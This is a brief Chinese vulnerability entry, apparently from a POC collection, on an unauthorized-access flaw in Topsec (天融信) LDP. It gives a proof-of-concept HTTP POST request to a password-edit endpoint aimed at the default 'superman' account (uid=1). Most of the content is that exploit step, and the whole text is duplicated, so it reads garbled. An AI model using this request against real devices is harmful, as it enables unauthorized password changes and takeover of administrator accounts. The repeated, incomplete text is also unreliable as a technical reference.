天融信LDP未授权访问漏洞
漏洞描述
天融信LDP存在未授权访问漏洞
漏洞影响
[!NOTE]
天融信LDP
漏洞复现
POC为
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
天融信LDP存在未授权访问漏洞
[!NOTE]
天融信LDP
POC为
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1